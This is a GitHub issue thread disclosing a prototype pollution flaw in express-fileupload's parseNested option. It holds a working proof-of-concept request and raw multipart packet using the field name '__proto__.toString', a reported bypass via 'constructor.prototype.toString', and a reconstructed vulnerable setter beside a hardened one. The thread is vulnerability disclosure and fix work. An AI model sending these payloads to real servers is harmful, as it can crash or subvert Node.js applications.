Prototype Pollution #236

Closed
po6ix opened this issue Jul 29, 2020 · 5 comments · Fixed by #237

@po6ix commented Jul 29, 2020

This module has a prototype pollution vulnerability, and it can cause a DoS with the parseNested option.

server

```javascript
const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();

// parseNested turns dotted multipart field names into nested objects
app.use(fileUpload({ parseNested: true }));

app.get('/', (req, res) => {
    res.end('express-fileupload poc');
});

app.listen(7777);
```

exploit

```python
import requests

# multipart field whose name is a dotted path into Object.prototype
res = requests.post('http://p6.is:7777', files={'__proto__.toString': 'express-fileupload poc'})
```

raw packet

```http
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 137

----------1566035451
Content-Disposition: form-data; name="__proto__.toString"; filename="filename"

content
----------1566035451--
```

Full description is here: https://blog.p6.is/Real-World-JS-1/

@richardgirges (Owner) commented

Thanks for reporting this. Fix has been applied and published to NPM: https://github.com/richardgirges/express-fileupload/releases/tag/1.1.8

@securityMB commented

@richardgirges The fix can be bypassed. Instead of referencing __proto__.toString, one can reference constructor.prototype.toString.
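A minimal reconstruction of the dotted-key nesting pattern and a hardened replacement, added here as an example and not the express-fileupload code: `unsafeSetNested` shows why both `__proto__.toString` and the `constructor.prototype.toString` bypass land on `Object.prototype`, while `safeSetNested` rejects any path segment that can reach a prototype. The function names and the sample field map are assumptions.

```javascript
// Constructed sample input: the two field names reported in this thread.
const MALICIOUS_FIELDS = {
  '__proto__.toString': 'polluted',
  'constructor.prototype.toString': 'polluted',
};
// Path segments that let a dotted key climb from the body object onto a prototype.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);
// Naive setter: it only creates an object when a key is missing, so "__proto__"
// and "constructor.prototype" (both already present) resolve to Object.prototype.
function unsafeSetNested(target, path, value) {
  const parts = path.split('.');
  let node = target;
  for (let i = 0; i < parts.length - 1; i++) {
    if (node[parts[i]] === undefined) node[parts[i]] = {};
    node = node[parts[i]];
  }
  node[parts[parts.length - 1]] = value;
  return target;
}
// Hardened setter: reject blocked segments (covers the constructor.prototype bypass,
// not only __proto__), descend through own properties only, use null-prototype nodes.
function safeSetNested(target, path, value) {
  const parts = path.split('.');
  const bad = parts.find((p) => BLOCKED.has(p));
  if (bad !== undefined) throw new Error(`rejected "${path}": segment "${bad}"`);
  let node = target;
  for (let i = 0; i < parts.length - 1; i++) {
    const key = parts[i];
    if (!Object.prototype.hasOwnProperty.call(node, key) || typeof node[key] !== 'object' || node[key] === null) node[key] = Object.create(null);
    node = node[key];
  }
  node[parts[parts.length - 1]] = value;
  return target;
}
// Parse a flat field map; rejected names are returned so a caller can log them.
function parseFields(fields, setter) {
  const body = {}, rejected = [];
  for (const [name, value] of Object.entries(fields)) {
    try { setter(body, name, value); } catch (e) { rejected.push(name); }
  }
  return { body, rejected };
}
// Unsafe parse, then restore Object.prototype.toString so the process keeps working.
function pollutionDemo() {
  const saved = Object.getOwnPropertyDescriptor(Object.prototype, 'toString');
  parseFields(MALICIOUS_FIELDS, unsafeSetNested);
  const polluted = ({}).toString === 'polluted';
  Object.defineProperty(Object.prototype, 'toString', saved);
  return polluted;
}
```

Logging the `rejected` list is a cheap detection signal: a legitimate client has no reason to send field names containing these segments.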

@richardgirges (Owner) commented

Thanks @securityMB - it has been fixed and a second deprecation notice has been posted on NPM for all prior versions.

@ghost commented Aug 5, 2020

https://www.bleepingcomputer.com/news/security/nodejs-module-downloaded-7m-times-lets-hackers-inject-code/ They just announced in the news about this today.. yet you claim to have fixed it 5 days ago.. love how far the news is behind on this.. thanks for the quick fix of this issue! Someone should contact the news folks..

@richardgirges (Owner) commented

Thanks for the heads up on this @naraphox
